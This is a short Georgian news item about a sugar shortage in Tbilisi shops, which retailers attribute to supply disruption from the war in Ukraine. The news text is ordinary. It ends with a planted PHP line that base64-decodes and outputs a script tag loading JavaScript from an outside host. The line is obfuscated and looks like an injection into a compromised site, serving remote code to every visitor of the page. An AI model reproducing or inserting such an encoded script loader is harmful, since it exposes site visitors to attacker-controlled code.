celsiusi
ავერსი საქკაბელი
თბილისის მარკეტებში და სუპერმარკეტებში შაქრის დეფიციტია. საინფორმაციო სააგენტო "ბიზნესთაიმმა" საზოგადოებაში გავრცელებული ინფორმაციის გადასამოწმებლად რამდენიმე ქსელურ მაღაზიას და მინი–მარკეტს მიმართა და გაარკვია, რომ შაქრის დეფიციტი ამ წუთის მონაცემებით მართლაც არსებობს.
 
მაღაზიებში განმარტავენ, რომ არის მომარაგების პრობლემა, მინი-მარკეტები აღნიშნულს უკავშირებენ უკრაინაში მიმდინარე ომს და ამბობენ, რომ შაქრის დიდი პარტია უკრაინიდან შემოდიოდა, შესაბამისად გარკვეული შეფერხება ამას უკავშირდება. 
 
მინი მარკეტების მაღაზიების მეპატრონეები ამბობენ, რომ შაქარი შესაძლოა მომდევნო დღეებში მიიღონ და არ გამორიცხავენ, რომ მიწოდებული ახალი პარტიის ფასი გაზრდილი იყოს. საინფორმაციო სააგენტო "ბიზნესთაიმი" დეტალების  გარკვევას კომპეტენტურ პირებთან ცდილობს. 
 
განახლებადი ინფორმაცია
 
 
 
1151
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");